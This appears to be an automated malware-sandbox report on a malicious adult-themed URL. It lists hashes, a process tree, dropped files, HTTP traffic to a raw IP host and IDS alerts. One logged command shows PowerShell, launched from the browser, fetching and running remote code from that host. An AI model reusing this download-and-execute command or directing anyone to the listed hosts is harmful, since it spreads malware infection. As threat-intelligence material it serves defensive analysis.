Field | Value
---|---|
URL | http://seemesex.world
Full analysis | https://app.any.run/tasks/6ed3b407-889f-4165-bd04-4a9f73b46dee
Verdict | Malicious activity
Analysis date | May 30, 2020, 16:30:38
OS | Windows 10 Professional (build: 16299, 64 bit)
Indicators | 
MD5 | 3451C5CCAC21B0F1A09D6C59CADDD504
SHA1 | 0BC6234D36BC005358BA6C8385716E381722EC24
SHA256 | A00BB74C9EDC1DC54DEE348975C5AA1E6C3734864CA39D6DC3CD5825EDC1DB5F
SSDEEP | 3:N1KNAAIA88:CSAC8
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---|
3680 | "C:\Program Files\internet explorer\iexplore.exe" "http://seemesex.world" | C:\Program Files\internet explorer\iexplore.exe | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Internet Explorer; Version: 11.00.16299.15 (WinBuild.160101.0800)
4168 | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3680 CREDAT:9474 /prefetch:2 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | | iexplore.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Internet Explorer; Version: 11.00.16299.15 (WinBuild.160101.0800)
1836 | "C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe" -Embedding | C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe | — | svchost.exe | User: admin; Company: Adobe Systems Incorporated; Integrity Level: MEDIUM; Description: Adobe® Flash® Player Utility; Version: 29,0,0,171
800 | ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>IEX (New-Object Net.WebClient).DownloadString('http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187');" | C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe | | IEXPLORE.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Windows PowerShell; Exit code: 0; Version: 10.0.16299.15 (WinBuild.160101.0800)
3580 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | — | PowerShell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Console Window Host; Exit code: 0; Version: 10.0.16299.15 (WinBuild.160101.0800)
200 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.cmdline" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | — | PowerShell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Visual C# Command Line Compiler; Exit code: 0; Version: 4.7.2556.0 built by: NET471REL1
484 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RES2E3E.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSC4F126634FE8B4F72912FBF2B67C3BA1.TMP" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | — | csc.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Microsoft® Resource File To COFF Object Conversion Utility; Exit code: 0; Version: 12.00.52519.0 built by: VSWINSERVICING
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---|
800 | PowerShell.exe | C:\Users\admin\AppData\Local\Temp\Low\__PSScriptPolicyTest_xokpeyd5.hui.ps1 | — | — | —
800 | PowerShell.exe | C:\Users\admin\AppData\Local\Temp\Low\__PSScriptPolicyTest_1yqjz34a.nw4.psm1 | — | — | —
200 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\CSC4F126634FE8B4F72912FBF2B67C3BA1.TMP | — | — | —
484 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\Low\RES2E3E.tmp | — | — | —
200 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.dll | — | — | —
200 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.out | — | — | —
3680 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\UrlBlock\URL46D7.tmp | — | — | —
4168 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\FZ4P8RAN\10105_jokiest_Couldn[1].js | text | F836C010B14CBA02592A81B59BDC4976 | 39078DE84082E083DE45C60334A78513F1ECB25BED11B326E22545591C9C44D6
3680 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZSVOB39W\iecompatviewlist[1].xml | xml | AD288DEDE9F96BA9BF5928EEBB84F430 | 11EE91F9612C0EEC7C2E218DBCC2566549BACED502669054B56DA7837D891D9C
4168 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\LD57I5PR\pervades_8497_11925[1].htm | html | 914D2CEEC2AB02A814C0E680545F9F7A | 1F3B1F4B0A6FAFF6063ED8BB82A8FF11D78ED4BBE76EFF237743AE75AC853C86
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4168 | IEXPLORE.EXE | GET | 302 | 148.251.72.21:80 | http://seemesex.world/ | DE | — | — | malicious |
800 | PowerShell.exe | GET | — | 64.227.107.133:80 | http://64.227.107.133/12018-Gaveling/9KSzP?aVVc=2797 | US | — | — | suspicious |
3680 | iexplore.exe | GET | 404 | 64.227.107.133:80 | http://64.227.107.133/favicon.ico | US | — | — | suspicious |
4168 | IEXPLORE.EXE | GET | 302 | 94.130.90.228:80 | http://atztds547.xyz/xn94r2398us2938u4s | DE | — | — | suspicious |
800 | PowerShell.exe | GET | 200 | 64.227.107.133:80 | http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187 | US | text | 2.08 Kb | suspicious |
4168 | IEXPLORE.EXE | GET | 200 | 64.227.107.133:80 | http://64.227.107.133/1966_04_15/Trinkums/pervades_8497_11925 | US | html | 4.90 Kb | suspicious |
4168 | IEXPLORE.EXE | POST | 200 | 64.227.107.133:80 | http://64.227.107.133/computing-Deperm/agkZId | US | text | 9.88 Kb | suspicious |
4168 | IEXPLORE.EXE | GET | 200 | 64.227.107.133:80 | http://64.227.107.133/795X/10105_jokiest_Couldn?gjMJD=Fumeuse_Ankusha_mislays | US | text | 28.2 Kb | suspicious |
4168 | IEXPLORE.EXE | POST | 200 | 64.227.107.133:80 | http://64.227.107.133/1989-05-27/Demarcate/W0p6/13110_5680?Chaliced=zxHq | US | text | 7.21 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3680 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
4276 | svchost.exe | 20.191.48.196:443 | settings-win-ppe.data.microsoft.com | Microsoft Corporation | US | unknown |
4168 | IEXPLORE.EXE | 148.251.72.21:80 | seemesex.world | Hetzner Online GmbH | DE | suspicious |
800 | PowerShell.exe | 64.227.107.133:80 | — | Peer 1 Network (USA) Inc. | US | suspicious |
4168 | IEXPLORE.EXE | 64.227.107.133:80 | — | Peer 1 Network (USA) Inc. | US | suspicious |
4168 | IEXPLORE.EXE | 94.130.90.228:80 | atztds547.xyz | Hetzner Online GmbH | DE | malicious |
3680 | iexplore.exe | 13.80.7.77:443 | urs.microsoft.com | Microsoft Corporation | NL | unknown |
3680 | iexplore.exe | 64.227.107.133:80 | — | Peer 1 Network (USA) Inc. | US | suspicious |
4168 | IEXPLORE.EXE | 13.80.7.77:443 | urs.microsoft.com | Microsoft Corporation | NL | unknown |
Domain | IP | Reputation
---|---|---|
seemesex.world | | malicious
atztds547.xyz | | suspicious
urs.microsoft.com | | whitelisted
iecvlist.microsoft.com | | whitelisted
c.urs.microsoft.com | | whitelisted
ieonline.microsoft.com | | whitelisted
nexusrules.officeapps.live.com | | whitelisted
self.events.data.microsoft.com | | whitelisted
settings-win-ppe.data.microsoft.com | | whitelisted
dns.msftncsi.com | | shared
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO Observed DNS Query to .world TLD |
4168 | IEXPLORE.EXE | Potentially Bad Traffic | ET INFO HTTP Request to Suspicious *.world Domain |
4168 | IEXPLORE.EXE | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |